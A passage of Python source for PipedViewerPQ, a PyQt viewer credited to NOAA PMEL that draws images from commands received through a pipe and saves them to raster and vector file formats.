QFileDialog, QFontMetricsF, QImage, QLabel, \\\n QMainWindow, QMessageBox, QPainter, QPalette, \\\n QPen, QPicture, QPixmap, QPolygonF, QPrinter, \\\n QPushButton, QScrollArea, QTextDocument\n from PyQt4.QtSvg import QSvgGenerator\n\nfrom multiprocessing import Pipe, Process\n\nfrom pipedviewer import WINDOW_CLOSED_MESSAGE\nfrom pipedviewer.cmndhelperpq import CmndHelperPQ\nfrom pipedviewer.scaledialogpq import ScaleDialogPQ\n\n\nclass PipedViewerPQ(QMainWindow):\n '''\n A PyQt graphics viewer that receives generic drawing commands\n through a pipe. Uses a list of QPictures to record the drawings\n which are then used to display, manipulate, and save the image.\n\n A drawing command is a dictionary with string keys that will be\n interpreted into the appropriate PyQt command(s). For example,\n { \"action\":\"drawText\",\n \"text\":\"Hello\",\n \"font\":{\"family\":\"Times\", \"size\":100, \"italic\":True},\n \"fill\":{\"color\":0x880000, \"style\":\"cross\"},\n \"outline\":{\"color\":\"black\"},\n \"location\":(250,350) }\n\n The command { \"action\":\"exit\" } will shutdown the viewer.\n '''\n\n def __init__(self, cmndpipe, rspdpipe):\n '''\n Create a PyQt viewer which reads commands from the Pipe\n cmndpipe and writes responses back to rspdpipe.\n '''\n super(PipedViewerPQ, self).__init__()\n self.__cmndpipe = cmndpipe\n self.__rspdpipe = rspdpipe\n # ignore Ctrl-C\n signal.signal(signal.SIGINT, signal.SIG_IGN)\n # default scene size\n self.__scenewidth = int(10.8 * self.physicalDpiX())\n self.__sceneheight = int(8.8 * self.physicalDpiY())\n # scaling factor for line widths and symbol sizes\n self.__widthfactor = None\n self.setWidthScalingFactor(0.72)\n # by default pay attention to any alpha channel values in colors\n self.__noalpha = False\n # initial default color for the background (opaque white)\n self.__lastclearcolor = QColor(0xFFFFFF)\n self.__lastclearcolor.setAlpha(0xFF)\n # List of QPictures creating the current scene\n self.__viewpics = [ ]\n self.__segid = None\n # QPicture/QPainter pair for the current view\n self.__activepicture = None\n self.__activepainter = None\n # Antialias when drawing?\n self.__antialias = True\n # data for recreating the current view\n self.__fracsides = None\n self.__clipit = True\n # number of drawing commands in the active painter\n self.__drawcount = 0\n # Limit the number of drawing commands per picture\n # to avoid the appearance of being \"stuck\"\n self.__maxdraws = 1024\n # scaling factor for creating the displayed scene\n self.__scalefactor = 1.0\n # automatically adjust the scaling factor to fit the window frame?\n self.__autoscale = True\n # values used to decide if the scene needs to be updated\n self.__lastpicdrawn = 0\n self.__createpixmap = True\n self.__clearpixmap = True\n # Calculations of modified rectangular regions in QPictures\n # currently do not account for width and height of QPictures\n # played inside them. So keep a expansion value.\n self.__maxsymbolwidth = 0.0\n self.__maxsymbolheight = 0.0\n # create the label, that will serve as the canvas, in a scrolled area\n self.__scrollarea = QScrollArea(self)\n self.__label = QLabel(self.__scrollarea)\n # set the initial label size and other values for the scrolled area\n self.__label.setMinimumSize(self.__scenewidth, self.__sceneheight)\n self.__label.resize(self.__scenewidth, self.__sceneheight)\n # setup the scrolled area\n self.__scrollarea.setWidget(self.__label)\n self.__scrollarea.setBackgroundRole(QPalette.Dark)\n self.setCentralWidget(self.__scrollarea)\n self.__minsize = 128\n # default file name and format for saving the image\n self.__lastfilename = \"ferret.png\"\n self.__lastformat = \"png\"\n self.__addedannomargin = 12\n # command helper object\n self.__helper = CmndHelperPQ(self)\n # Create the menubar\n self.__scaleact = QAction(self.tr(\"&Scale\"), self,\n shortcut=self.tr(\"Ctrl+S\"),\n statusTip=self.tr(\"Scale the image (canvas and image change size)\"),\n triggered=self.inquireSceneScale)\n self.__saveact = QAction(self.tr(\"Save &As...\"), self,\n shortcut=self.tr(\"Ctrl+A\"),\n statusTip=self.tr(\"Save the image to file\"),\n triggered=self.inquireSaveFilename)\n self.__redrawact = QAction(self.tr(\"&Redraw\"), self,\n shortcut=self.tr(\"Ctrl+R\"),\n statusTip=self.tr(\"Clear and redraw the image\"),\n triggered=self.redrawScene)\n self.__aboutact = QAction(self.tr(\"&About\"), self,\n statusTip=self.tr(\"Show information about this viewer\"),\n triggered=self.aboutMsg)\n self.__aboutqtact = QAction(self.tr(\"About &Qt\"), self,\n statusTip=self.tr(\"Show information about the Qt library\"),\n triggered=self.aboutQtMsg)\n self.createMenus()\n # Set the initial size of the viewer\n self.__framedelta = 4\n mwwidth = self.__scenewidth + self.__framedelta\n mwheight = self.__sceneheight + self.__framedelta \\\n + self.menuBar().height() \\\n + self.statusBar().height()\n self.resize(mwwidth, mwheight)\n # check the command queue any time there are no window events to deal with\n self.__timer = QTimer(self)\n self.__timer.timeout.connect(self.checkCommandPipe)\n self.__timer.setInterval(0)\n self.__timer.start()\n # initialize the parameters for watermark image display\n self.__wmarkFilename = None\n self.__xloc = None\n self.__yloc = None\n self.__scalefrac = None\n self.__opacity = None\n self.__wmkdrawn = False\n\n def createMenus(self):\n '''\n Create the menu items for the viewer\n using the previously created actions.\n '''\n menuBar = self.menuBar()\n sceneMenu = menuBar.addMenu(menuBar.tr(\"&Image\"))\n sceneMenu.addAction(self.__scaleact)\n sceneMenu.addAction(self.__saveact)\n sceneMenu.addAction(self.__redrawact)\n helpMenu = menuBar.addMenu(menuBar.tr(\"&Help\"))\n helpMenu.addAction(self.__aboutact)\n helpMenu.addAction(self.__aboutqtact)\n\n def showEvent(self, event):\n '''\n When the viewer is going to be shown, make sure all\n the current pictures are displayed in the scene.\n '''\n # update, ignoring the visibility flags\n self.drawLastPictures(True)\n event.accept()\n\n def resizeEvent(self, event):\n '''\n Monitor resizing in case auto-scaling of the image is selected.\n '''\n if self.__autoscale:\n if self.autoScaleScene():\n # continue with the window resize\n event.accept()\n else:\n # another resize coming in, so ignore this one\n event.ignore()\n else:\n # continue with the window resize\n event.accept()\n\n def closeEvent(self, event):\n '''\n Clean up and send the WINDOW_CLOSED_MESSAGE on the response pipe\n before closing the window.\n '''\n self.__timer.stop()\n self.__cmndpipe.close()\n try:\n try:\n self.__rspdpipe.send(WINDOW_CLOSED_MESSAGE)\n finally:\n self.__rspdpipe.close()\n except Exception:\n pass\n event.accept()\n\n def exitViewer(self):\n '''\n Close and exit the viewer.\n '''\n self.close()\n\n def aboutMsg(self):\n QMessageBox.about(self, self.tr(\"About PipedViewerPQ\"),\n self.tr(\"\\n\" \\\n \"PipedViewerPQ is a graphics viewer application that receives its \" \\\n \"drawing and other commands primarily from another application \" \\\n \"through a pipe. A limited number of commands are provided by \" \\\n \"the viewer itself to allow saving and some manipulation of the \" \\\n \"displayed image. The controlling application, however, may be \" \\\n \"unaware of these modifications made to the image. \" \\\n \"\\n\\n\" \\\n \"PipedViewerPQ was developed by the Thermal Modeling and Analysis \" \\\n \"Project (TMAP) of the National Oceanographic and Atmospheric \" \\\n \"Administration's (NOAA) Pacific Marine Environmental Lab (PMEL). \"))\n\n def aboutQtMsg(self):\n QMessageBox.aboutQt(self, self.tr(\"About Qt\"))\n\n def ignoreAlpha(self):\n '''\n Return whether the alpha channel in colors should always be ignored.\n '''\n return self.__noalpha\n\n def paintScene(self, painter, first, leftx, uppery, scalefactor,\n statusmsg, returnregion):\n '''\n Draws the pictures self.__viewpics[first:] using the QPainter\n painter. This QPainter should have been initialized\n appropriately for the QPaintDevice to which it is painting\n (e.g., QImage.fill with the desired background color).\n\n The point (leftx, uppery) is the offset of the origin after\n scaling using scalefactor. (All are floating point values.)\n\n The status bar will be updated with a message derived from\n statusmsg before drawing each picture. Upon completion, the\n status bar will be cleared.\n\n If returnregion is True, a list of QRect objects describing\n the modified regions will be computed and returned. If\n returnregion is False, the modified region will not be computed\n and an empty list will be returned.\n\n The call to painter.end() will need to be made after calling\n this function.\n '''\n # change the cursor to warn the user this may take some time\n QApplication.setOverrideCursor(Qt.WaitCursor)\n # create the incomplete status message\n if (first + 1) < len(self.__viewpics):\n mymsg = \"%s (piece %%s of %s)\" % (statusmsg, str(len(self.__viewpics)))\n else:\n mymsg = \"%s (piece %%s)\" % statusmsg\n # get the origin for drawing the pictures after scaling\n myorigin = QPointF(leftx, uppery)\n # set the scaling factor for the pictures\n painter.scale(scalefactor, scalefactor)\n modrects = [ ]\n # draw the appropriate pictures\n k = first\n for (viewpic, _) in self.__viewpics[first:]:\n k += 1\n # show the progress message\n self.statusBar().showMessage( self.tr(mymsg % str(k)) )\n # draw the picture\n painter.drawPicture(myorigin, viewpic)\n if returnregion:\n picrect = viewpic.boundingRect()\n if picrect.isValid():\n # Expand the region to account for possible symbols\n xval = picrect.x() - 0.5 * self.__maxsymbolwidth\n yval = picrect.y() - 0.5 * self.__maxsymbolheight\n width = picrect.width() + self.__maxsymbolwidth\n height = picrect.height() + self.__maxsymbolheight\n # Scale and translate the region, then convert to integer\n xval = int( math.floor(xval * scalefactor + leftx) )\n width = int( math.ceil(width * scalefactor) )\n yval = int( math.floor(yval * scalefactor + uppery) )\n height = int( math.ceil(height * scalefactor) )\n # Add this rectangle to the list\n modrects.append( QRect(xval, yval, width, height) )\n # done - clear the status message\n self.statusBar().clearMessage()\n # restore the cursor back to normal\n QApplication.restoreOverrideCursor()\n if (self.__wmarkFilename is not None) and not self.__wmkdrawn:\n # painter = QPainter(self.__label.pixmap())\n # Initialize watermark objects\n wmkpic = QPixmap(self.__wmarkFilename)\n wmkpt = QPointF()\n wmkpt.setX(self.__xloc)\n wmkpt.setY(self.__yloc)\n # set watermark image display opacity\n painter.setOpacity(self.__opacity)\n # set image scale\n painter.scale(self.__scalefrac, self.__scalefrac)\n # paint watermark image at specified location\n painter.setRenderHint(QPainter.Antialiasing)\n painter.drawPixmap(wmkpt, wmkpic)\n # painter.end()\n self.__wmkdrawn = True\n return modrects\n\n def drawLastPictures(self, ignorevis):\n '''\n Update the scene with pictures yet to be drawn.\n If ignorevis is True, the update will be done\n even if the viewer is not visible; otherwise\n drawing to the scene label is only done if the\n viewer is visible.\n '''\n if not ignorevis:\n if self.isMinimized() or not self.isVisible():\n # Not shown, so do not waste time drawing\n return\n if self.__createpixmap:\n # Create and assign a cleared pixmap\n mypixmap = QPixmap(self.__label.size())\n mypixmap.fill(self.__lastclearcolor)\n self.__label.setPixmap(mypixmap)\n self.__createpixmap = False\n self.__clearpixmap = False\n wascleared = True\n elif self.__clearpixmap:\n # Clear the existing pixmap\n self.__label.pixmap().fill(self.__lastclearcolor)\n self.__clearpixmap = False\n wascleared = True\n elif len(self.__viewpics) > self.__lastpicdrawn:\n # New pictures to add to an existing scene\n # wascleared = False\n # Rectangles of modified regins incorrect for drawText\n # so always update the entire scene\n wascleared = True\n else:\n # Nothing changed so just return\n return\n # Only create the QPainter if there are pictures\n # to draw (this is more than just a clear)\n if len(self.__viewpics) > self.__lastpicdrawn:\n painter = QPainter(self.__label.pixmap())\n modrects = self.paintScene(painter, self.__lastpicdrawn, \\\n 0.0, 0.0, self.__scalefactor, \\\n \"Drawing\", not wascleared)\n painter.end()\n # if watermark is specified, display after other plotting occurs\n # if (self.__wmarkFilename is not None) and not self.__wmkdrawn:\n # painter = QPainter(self.__label.pixmap())\n # # Initialize watermark objects\n # wmkpic = QPixmap(self.__wmarkFilename)\n # wmkpt = QPointF()\n # wmkpt.setX(self.__xloc)\n # wmkpt.setY(self.__yloc)\n # # set watermark image display opacity\n # painter.setOpacity(self.__opacity)\n # # set image scale\n # painter.scale(self.__scalefrac, self.__scalefrac)\n # # paint watermark image at specified location\n # painter.setRenderHint(QPainter.Antialiasing)\n # painter.drawPixmap(wmkpt, wmkpic)\n # painter.end()\n # self.__wmkdrawn = True\n # Notify the label of changes to the scene\n if wascleared:\n # the entire scene changed\n self.__label.update()\n else:\n # the scene changed only in the modrects areas\n for rect in modrects:\n self.__label.update(rect)\n # Update the record of which pictures have been displayed\n self.__lastpicdrawn = len(self.__viewpics)\n\n def clearScene(self, bkgcolor):\n '''\n Removes all view pictures, and fills the scene with bkgcolor.\n If bkgcolor is None or an invalid color, the color used is\n the one used from the last clearScene or redrawScene call\n with a valid color (or opaque white if a color has never\n been specified).\n '''\n # If there is an active View with content,\n # end it now, but do not update the scene\n if self.__activepainter and (self.__drawcount > 0):\n self.endView(False)\n restartview = True\n else:\n restartview = False\n # get the color to use for clearing (the background color)\n if bkgcolor:\n if bkgcolor.isValid():\n self.__lastclearcolor = bkgcolor\n # Delete all the pictures from the list and\n # mark that the pixmap needs to be cleared\n self.__viewpics[:] = [ ]\n self.__maxsymbolwidth = 0.0\n self.__maxsymbolheight = 0.0\n self.__clearpixmap = True\n self.__lastpicdrawn = 0\n # Update the scene label if visible\n self.drawLastPictures(False)\n # If there was an non-empty active View, restart it\n if restartview:\n self.beginViewFromSides(self.__fracsides, self.__clipit)\n\n def redrawScene(self, bkgcolor=None):\n '''\n Clear the scene using the given background color and redraw all\n the pictures to the displayed scene. If bkgcolor is None or an\n invalid color, the color used is the one used from the last\n clearScene or redrawScene call with a valid color (or opaque\n white if a color has never been specified).\n '''\n # If there is an active View, end it now, but do not update the scene\n if self.__activepainter:\n self.endView(False)\n hadactiveview = True\n else:\n hadactiveview = False\n if bkgcolor:\n if bkgcolor.isValid():\n self.__lastclearcolor = bkgcolor\n # mark that the pixmap needs to be cleared\n # and all the pictures redrawn\n self.__clearpixmap = True\n self.__lastpicdrawn = 0\n # Update the scene label if visible\n self.drawLastPictures(False)\n # If there was an active View, restart it in this new system\n if hadactiveview:\n self.beginViewFromSides(self.__fracsides, self.__clipit)\n\n def resizeScene(self, width, height):\n '''\n Resize the scene to the given width and height in units of pixels.\n '''\n newwidth = int(width + 0.5)\n if newwidth < self.__minsize:\n newwidth = self.__minsize\n newheight = int(height + 0.5)\n if newheight < self.__minsize:\n newheight = self.__minsize\n if (newwidth != self.__scenewidth) or (newheight != self.__sceneheight):\n # Resize the label and set label values\n # so the scrollarea knows of the new size\n labelwidth = int(newwidth * self.__scalefactor + 0.5)\n labelheight = int(newheight * self.__scalefactor + 0.5)\n self.__label.setMinimumSize(labelwidth, labelheight)\n self.__label.resize(labelwidth, labelheight)\n # mark that the pixmap needs to be recreated\n self.__scenewidth = newwidth\n self.__sceneheight = newheight\n self.__createpixmap = True\n # If auto-scaling, set scaling factor to 1.0 and resize the window\n if self.__autoscale:\n self.__scalefactor = 1.0\n barheights = self.menuBar().height() + self.statusBar().height()\n self.resize(newwidth + self.__framedelta,\n newheight + self.__framedelta + barheights)\n # the resize should redraw the scene\n else:\n # Redraw the scene from the beginning using the scaling factor\n self.redrawScene()\n\n\n def inquireSceneScale(self):\n '''\n Prompt the user for the desired scaling factor for the scene.\n '''\n labelwidth = int(self.__scenewidth * self.__scalefactor + 0.5)\n labelheight = int(self.__sceneheight * self.__scalefactor + 0.5)\n scaledlg = ScaleDialogPQ(self.__scalefactor, labelwidth, labelheight,\n self.__minsize, self.__minsize, self.__autoscale, self)\n if scaledlg.exec_():\n (newscale, autoscale, okay) = scaledlg.getValues()\n if okay:\n if autoscale:\n self.__autoscale = True\n self.autoScaleScene()\n else:\n self.__autoscale = False\n self.scaleScene(newscale, False)\n\n def autoScaleScene(self):\n '''\n Selects a scaling factor that maximizes the scene within the window\n frame without requiring scroll bars. Intended to be called when\n the window size is changed by the user and auto-scaling is turn on.\n\n Returns:\n True if scaling of this scene is done (no window resize)\n False if the a new resize command was issued\n '''\n barheights = self.menuBar().height() + self.statusBar().height()\n\n # get the size for the central widget\n cwheight = self.height() - barheights - self.__framedelta\n heightsf = float(cwheight) / float(self.__sceneheight)\n\n cwwidth = self.width() - self.__framedelta\n widthsf = float(cwwidth) / float(self.__scenewidth)\n\n if heightsf < widthsf:\n factor = heightsf\n else:\n factor = widthsf\n\n newcwheight = int(factor * self.__sceneheight + 0.5)\n newcwwidth = int(factor * self.__scenewidth + 0.5)\n\n # if the window does not have the correct aspect ratio, resize it so\n # it will; this will generate another call to this method. Otherwise,\n # scale the scene and be done.\n if self.isMaximized() or \\\n ( (abs(cwheight - newcwheight) <= self.__framedelta) and \\\n (abs(cwwidth - newcwwidth) <= self.__framedelta) ):\n self.scaleScene(factor, False)\n return True\n else:\n self.resize(newcwwidth + self.__framedelta,\n newcwheight + self.__framedelta + barheights)\n return False\n\n def scaleScene(self, factor, resizewin):\n '''\n Scales both the horizontal and vertical directions by factor.\n Scaling factors are not accumulative. So if the scene was\n already scaled, that scaling is \"removed\" before this scaling\n factor is applied. If resizewin is True, the main window is\n resized to accommodate this new scaled scene size.\n\n If factor is zero, just switch to auto-scaling at the current\n window size. If factor is negative, rescale using the absolute\n value (possibly resizing the window) then switch to auto-scaling.\n '''\n fltfactor = float(factor)\n if fltfactor != 0.0:\n if resizewin:\n # from command - turn off autoscaling for the following\n # then turn back on if appropriate\n self.__autoscale = False\n newfactor = abs(fltfactor)\n newlabwidth = int(newfactor * self.__scenewidth + 0.5)\n newlabheight = int(newfactor * self.__sceneheight + 0.5)\n if (newlabwidth < self.__minsize) or (newlabheight < self.__minsize):\n # Set to minimum size\n if self.__scenewidth <= self.__sceneheight:\n newfactor = float(self.__minsize) / float(self.__scenewidth)\n else:\n newfactor = float(self.__minsize) / float(self.__sceneheight)\n newlabwidth = int(newfactor * self.__scenewidth + 0.5)\n newlabheight = int(newfactor * self.__sceneheight + 0.5)\n oldlabwidth = int(self.__scalefactor * self.__scenewidth + 0.5)\n oldlabheight = int(self.__scalefactor * self.__sceneheight + 0.5)\n if (newlabwidth != oldlabwidth) or (newlabheight != oldlabheight):\n # Set the new scaling factor\n self.__scalefactor = newfactor\n # Resize the label and set label values\n # so the scrollarea knows of the new size\n self.__label.setMinimumSize(newlabwidth, newlabheight)\n self.__label.resize(newlabwidth, newlabheight)\n # mark that the pixmap needs to be recreated\n self.__createpixmap = True\n # Redraw the scene from the beginning\n self.redrawScene()\n if resizewin:\n # resize the main window (if possible)\n barheights = self.menuBar().height() + self.statusBar().height()\n mwheight = newlabheight + barheights + self.__framedelta\n mwwidth = newlabwidth + self.__framedelta\n # Do not exceed the available real estate on the screen.\n # If autoscaling is in effect, the resize will trigger\n # any required adjustments.\n scrnrect = QApplication.desktop().availableGeometry()\n if mwwidth > 0.95 * scrnrect.width():\n mwwidth = int(0.9 * scrnrect.width())\n if mwheight > 0.95 * scrnrect.height():\n mwheight = int(0.9 * scrnrect.height())\n self.resize(mwwidth, mwheight)\n if fltfactor <= 0.0:\n # From command - turn on autoscaling\n self.__autoscale = True\n self.autoScaleScene();\n\n def inquireSaveFilename(self):\n '''\n Prompt the user for the name of the file into which to save the scene.\n The file format will be determined from the filename extension.\n '''\n formattypes = [ ( \"png\",\n \"PNG - Portable Networks Graphics (*.png)\"),\n ( \"jpeg\",\n \"JPEG - Joint Photographic Experts Group (*.jpeg *.jpg *.jpe)\" ),\n ( \"tiff\",\n \"TIFF - Tagged Image File Format (*.tiff *.tif)\" ),\n ( \"pdf\",\n \"PDF - Portable Document Format (*.pdf)\" ),\n ( \"ps\",\n \"PS - PostScript (*.ps)\" ),\n ( \"svg\",\n \"SVG - Scalable Vector Graphics (*.svg)\" ),\n ( \"bmp\",\n \"BMP - Windows Bitmap (*.bmp)\" ),\n ( \"ppm\",\n \"PPM - Portable Pixmap (*.ppm)\" ),\n ( \"xpm\",\n \"XPM - X11 Pixmap (*.xpm)\" ),\n ( \"xbm\",\n \"XBM - X11 Bitmap (*.xbm)\" ), ]\n filters = \";;\".join( [ t[1] for t in formattypes ] )\n if PYTHONQT_VERSION == 'PyQt4':\n # tr returns QStrings in PyQt4 (Python2)\n (fileName, fileFilter) = QFileDialog.getSaveFileNameAndFilter(self,\n self.tr(\"Save the current image as \"), self.tr(self.__lastfilename), self.tr(filters))\n else:\n # tr returns Python unicode strings in PySide2 or PyQt5 (Python3)\n (fileName, fileFilter) = QFileDialog.getSaveFileName(self,\n self.tr(\"Save the current image as \"), self.tr(self.__lastfilename), self.tr(filters))\n if fileName:\n for (fmt, fmtQName) in formattypes:\n if self.tr(fmtQName) == fileFilter:\n fileFormat = fmt\n break\n else:\n raise RuntimeError(\"Unexpected file format name '%s'\" % fileFilter)\n self.saveSceneToFile(fileName, fileFormat, None, None, None, None)\n self.__lastfilename = fileName\n self.__lastformat = fileFormat\n\n def saveSceneToFile(self, filename, imageformat, transparent,\n vectsize, rastsize, myannotations):\n '''\n Save the current scene to the named file. If imageformat\n is empty or None, the format is guessed from the filename\n extension.\n\n If transparent is False, the entire scene is initialized\n to the last clearing color used, using a filled rectangle\n for vector images.\n\n If given, vectsize is the size in inches of a saved vector\n image. If vectsize is not given, a vector image will be\n saved at the current displayed scaled image size, unless\n specified otherwise if showPrintDialog is True.\n\n If given, rastsize is the pixels size of a saved raster\n image. If rastsize is not given, a raster image will be\n saved at the current displayed scaled image size.\n\n If myannotations is not None, the strings given in the tuple\n are to be displayed above the image. These annotations add\n height, as needed, to the saved image (i.e., vectsize or\n rastsize gives the height of the image below these annotations).\n '''\n # This could be called when there is no scene present.\n # If this is the case, ignore the call.\n if len(self.__viewpics) == 0:\n return\n if not imageformat:\n # Guess the image format from the filename extension\n # to determine if it is a vector type, and if so,\n # which type. All the raster types use a QImage, which\n # does this guessing of format when saving the image.\n fileext = ( os.path.splitext(filename)[1] ).lower()\n if fileext == '.pdf':\n # needs a PDF QPrinter\n myformat = 'pdf'\n elif fileext == '.eps':\n # needs a PS QPrinter and never rotate\n myformat = 'eps'\n elif fileext == '.ps':\n # needs a PS QPrinter\n myformat = 'ps'\n elif fileext == '.svg':\n # needs a QSvgGenerator\n myformat = 'svg'\n elif fileext == '.plt':\n # check for plt (gks metafile) - needs to be changed to pdf\n myformat = 'plt'\n elif fileext == '.gif':\n # check for gif - needs to be changed to png\n myformat = 'gif'\n else:\n # use a QImage and let it figure out the format\n myformat = None\n else:\n myformat = imageformat.lower()\n\n if myformat == 'plt':\n # Silently convert plt filename and format to pdf\n myformat = 'pdf'\n myfilename = os.path.splitext(filename)[0] + \".pdf\"\n elif myformat == 'gif':\n # Silently convert gif filename and format to png\n myformat = 'png'\n myfilename = os.path.splitext(filename)[0] + \".png\"\n else:\n myfilename = filename\n\n if myannotations:\n annopicture = QPicture()\n annopainter = QPainter(annopicture)\n annotextdoc = QTextDocument()\n # Leave room for the added margins to the width\n annotextdoc.setTextWidth(self.__scenewidth - 2.0 * self.__addedannomargin)\n annotextdoc.setHtml(\"

    \" + \"
    \".join(myannotations) + \"

    \")\n annotextdoc.drawContents(annopainter)\n annopainter.end()\n annosize = annotextdoc.documentLayout().documentSize()\n else:\n annopicture = None\n annosize = None\n\n if (myformat == 'ps') or (myformat == 'eps') or (myformat == 'pdf'):\n # Setup the QPrinter that will be used to create the EPS, PS, or PDF file\n printer = QPrinter(QPrinter.HighResolution)\n printer.setOutputFileName(myfilename)\n # The print format is automatically set from the\n # filename extension; so the following is actually\n # only needed for absent or strange extensions\n if (myformat == 'ps') or (myformat == 'eps'):\n printer.setOutputFormat(QPrinter.PostScriptFormat)\n else:\n printer.setOutputFormat(QPrinter.PdfFormat)\n # Print to file in color\n printer.setColorMode(printer.Color)\n # get the width and height in inches of the image to be produced\n if vectsize:\n imagewidth = vectsize.width()\n imageheight = vectsize.height()\n else:\n imagewidth = self.__scenewidth * self.__scalefactor \\\n / float(self.physicalDpiX())\n imageheight = self.__sceneheight * self.__scalefactor \\\n / float(self.physicalDpiY())\n # Add in any height needed for the annotations\n if annopicture:\n annoheight = (annosize.height() + 2 * self.__addedannomargin) * \\\n imageheight / self.__sceneheight\n imageheight += annoheight\n # Set the image size\n try:\n # Set custom paper size to just fit around the image\n if (myformat != 'eps') and (imagewidth > imageheight):\n printer.setPaperSize(QSizeF(imageheight, imagewidth), QPrinter.Inch)\n else:\n printer.setPaperSize(QSizeF(imagewidth, imageheight), QPrinter.Inch)\n # The above has issues with Qt 4.6 at GFDL -\n # still puts it on the default letter size page.\n # So just always use a letter size page.\n # printer.setPaperSize(QPrinter.Letter)\n except AttributeError:\n # setPaperSize introduced in 4.4 and made setPageSize\n # obsolete; but RHEL5 Qt4 is 4.2, so set to letter size\n printer.setPageSize(QPrinter.Letter)\n # No margins (setPageMargins introduced in 4.4)\n printer.setFullPage(True)\n # Default orientation\n if (myformat != 'eps') and (imagewidth > imageheight):\n printer.setOrientation(QPrinter.Landscape)\n else:\n printer.setOrientation(QPrinter.Portrait)\n # also get the image size in units of printer dots\n printres = printer.resolution()\n printwidth = int(imagewidth * printres + 0.5)\n printheight = int(imageheight * printres + 0.5)\n # Set up to draw to the QPrinter\n painter = QPainter(printer)\n if not transparent:\n # Draw a rectangle filling the entire scene\n # with the last clearing color.\n # Only draw if not completely transparent\n if (self.__lastclearcolor.getRgb())[3] > 0:\n painter.fillRect(QRectF(0, 0, printwidth, printheight),\n self.__lastclearcolor)\n # Scaling printfactor for the scene to the saved image\n widthscalefactor = imagewidth * self.physicalDpiX() / float(self.__scenewidth)\n # Check if there are annotations to add\n if annopicture:\n # Scale the scene now for the annotations\n painter.scale(widthscalefactor, widthscalefactor)\n # factor that makes it work after scaling (12.5 = 1200 / 96)\n printfactor = printres / self.physicalDpiX()\n # Draw a solid white rectangle with black outline for the annotations\n painter.setBrush(QBrush(Qt.white, Qt.SolidPattern))\n painter.setPen(QPen(QBrush(Qt.black, Qt.SolidPattern),\n 2.0 * printfactor, Qt.SolidLine, Qt.SquareCap, Qt.MiterJoin))\n painter.drawRect(QRectF(1.0 * printfactor, 1.0 * printfactor,\n (self.__scenewidth - 2.0) * printfactor,\n ((annosize.height() + 2.0 * self.__addedannomargin) - 2.0) * printfactor))\n # And add the annotations within this box\n painter.drawPicture(QPointF(self.__addedannomargin * printfactor,\n self.__addedannomargin * printfactor),\n annopicture)\n # Draw the scene to the printer - scaling already in effect\n self.paintScene(painter, 0, 0.0,\n (annosize.height() + 2.0 * self.__addedannomargin) * printfactor,\n 1.0, \"Saving\", False)\n else:\n # No annotations so just do the normal drawing\n self.paintScene(painter, 0, 0.0, 0.0,\n widthscalefactor, \"Saving\", False)\n if (self.__wmarkFilename is not None):\n # Initialize watermark objects\n wmkpic = QPixmap(self.__wmarkFilename)\n wmkpt = QPointF()\n wmkpt.setX(self.__xloc)\n wmkpt.setY(self.__yloc)\n # set watermark image display opacity\n painter.setOpacity(self.__opacity)\n # set image scale\n painter.scale(self.__scalefrac, self.__scalefrac)\n # paint watermark image at specified location\n painter.setRenderHint(QPainter.Antialiasing)\n painter.drawPixmap(wmkpt, wmkpic)\n painter.end()\n elif myformat == 'svg':\n generator = QSvgGenerator()\n generator.setFileName(myfilename)\n if vectsize:\n imagewidth = int(vectsize.width() * self.physicalDpiX() + 0.5)\n imageheight = int(vectsize.height() * self.physicalDpiY() + 0.5)\n else:\n imagewidth = int(self.__scenewidth * self.__scalefactor + 0.5)\n imageheight = int(self.__sceneheight * self.__scalefactor + 0.5)\n # Add in any height needed for the annotations\n if annopicture:\n annoheight = (annosize.height() + 2 * self.__addedannomargin) * \\\n imageheight / self.__sceneheight\n imageheight += annoheight\n # Set the image size\n generator.setResolution(\n int(0.5 * (self.physicalDpiX() + self.physicalDpiY()) + 0.5) )\n generator.setSize( QSize(imagewidth, imageheight) )\n generator.setViewBox( QRect(0, 0, imagewidth, imageheight) )\n # paint the scene to this QSvgGenerator\n painter = QPainter(generator)\n if not transparent:\n # Draw a rectangle filling the entire scene\n # with the last clearing color.\n # Only draw if not completely transparent\n if (self.__lastclearcolor.getRgb())[3] > 0:\n painter.fillRect( QRectF(0, 0, imagewidth, imageheight),\n self.__lastclearcolor )\n # Scaling printfactor for the scene to the saved image\n widthscalefactor = imagewidth / float(self.__scenewidth)\n # Check if there are annotations to add\n if annopicture:\n # Scale the scene now for the annotations\n painter.scale(widthscalefactor, widthscalefactor)\n # Draw a solid white rectangle with black outline for the annotations\n painter.setBrush(QBrush(Qt.white, Qt.SolidPattern))\n painter.setPen(QPen(QBrush(Qt.black, Qt.SolidPattern),\n 2.0, Qt.SolidLine, Qt.SquareCap, Qt.BevelJoin))\n painter.drawRect(QRectF(1.0, 1.0,\n self.__scenewidth - 2.0,\n annosize.height() + 2.0 * self.__addedannomargin - 2.0))\n # And add the annotations within this box\n painter.drawPicture(QPointF(self.__addedannomargin,self.__addedannomargin),\n annopicture)\n # Draw the scene to the printer - scaling already in effect\n self.paintScene(painter, 0,\n 0.0, annosize.height() + 2.0 * self.__addedannomargin,\n 1.0, \"Saving\", False)\n else:\n # No annotations so just do the normal drawing\n self.paintScene(painter, 0, 0.0, 0.0,\n widthscalefactor, \"Saving\", False)\n if (self.__wmarkFilename is not None):\n # Initialize watermark objects\n wmkpic = QPixmap(self.__wmarkFilename)\n wmkpt = QPointF()\n wmkpt.setX(self.__xloc)\n wmkpt.setY(self.__yloc)\n # set watermark image display opacity\n painter.setOpacity(self.__opacity)\n # set image scale\n painter.scale(self.__scalefrac, self.__scalefrac)\n # paint watermark image at specified location\n painter.setRenderHint(QPainter.Antialiasing)\n painter.drawPixmap(wmkpt, wmkpic)\n painter.end()\n else:\n if rastsize:\n imagewidth = int(rastsize.width() + 0.5)\n imageheight = int(rastsize.height() + 0.5)\n else:\n imagewidth = int(self.__scenewidth * self.__scalefactor + 0.5)\n imageheight = int(self.__sceneheight * self.__scalefactor + 0.5)\n # Add in any height needed for the annotations\n if annopicture:\n annoheight = (annosize.height() + 2 * self.__addedannomargin) * \\\n imageheight / self.__sceneheight\n imageheight += annoheight\n # Create the image\n image = QImage( QSize(imagewidth, imageheight),\n QImage.Format_ARGB32_Premultiplied )\n # Indicate the recommended displayed size of PNG images\n image.setDotsPerMeterX(self.physicalDpiX() / 0.0254)\n image.setDotsPerMeterY(self.physicalDpiY() / 0.0254)\n # Initialize the image\n # Note that completely transparent gives black for formats not supporting\n # the alpha channel (JPEG) whereas ARGB32 with 0x00FFFFFF gives white\n if not transparent:\n # Clear the image with self.__lastclearcolor\n fillint = 